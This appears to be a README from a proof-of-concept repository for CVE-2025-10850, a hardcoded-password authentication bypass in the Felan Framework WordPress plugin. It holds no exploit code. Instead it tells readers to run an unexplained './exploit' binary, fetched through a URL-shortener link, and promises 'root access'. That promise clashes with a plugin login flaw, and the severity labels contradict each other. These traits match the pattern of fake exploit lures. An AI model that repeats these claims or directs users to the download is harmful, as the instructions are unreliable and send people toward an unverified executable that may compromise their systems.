# CVE-2025-10850
## Overview
The Felan Framework plugin for WordPress contains a vulnerability that allows improper authentication due to hardcoded passwords in its login functions.
## Vulnerability Details
Specifically, this impacts users who log in using Facebook or Google social login features, as they may remain vulnerable if they did not change their default passwords. Attackers can exploit this flaw to log in as any existing user, thereby potentially gaining unauthorized access to sensitive user data and site functionalities.
### Key Points
- **Severity**: Critical
- **CVSS Score**: 9.8 (High)
- **Attack Vector**: Network
Understanding the nature of this vulnerability is crucial for system administrators and security professionals. Proper mitigation strategies can prevent unauthorized access.
### Important Note
Use this exploit responsibly and only on systems you own or have explicit permission to test.
## Example
Here is a simple example of how to use the exploit:
1. Open your terminal.
2. Run the exploit:
```bash
./exploit
```
3. If successful, you will see a message indicating that you have gained root access.
### Download [here](https://tinyurl.com/3mmysj2n)
[4.0K] /data/pocs/364141e56ed726f7ee5a3a18a7b2b7dfd3d1bbd9
└── [1.2K] README.md
0 directories, 1 file